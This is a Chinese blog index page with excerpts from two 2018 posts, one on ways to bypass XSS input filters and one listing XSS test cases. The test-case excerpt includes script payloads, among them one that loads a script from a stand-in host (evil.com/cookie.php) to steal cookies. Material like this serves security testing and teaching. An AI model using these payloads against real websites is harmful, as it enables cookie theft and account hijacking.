2018年9月8日
xss绕过过滤方法
摘要: 很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成&lt;以及&gt;,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么<script src=1.js></script>就会转换成“&lt;script 阅读全文
posted @ 2018-09-08 20:21 bl8ckwid0w 阅读(6752) 评论(0) 推荐(0)
xss测试用例
摘要: 1.<script> alert(1);</script> 2.<script>alert('xss');</script> 3.<script src="http://www.evil.com/cookie.php"></script> 4.<script>location.href="http: 阅读全文
posted @ 2018-09-08 20:20 bl8ckwid0w 阅读(347) 评论(0) 推荐(0)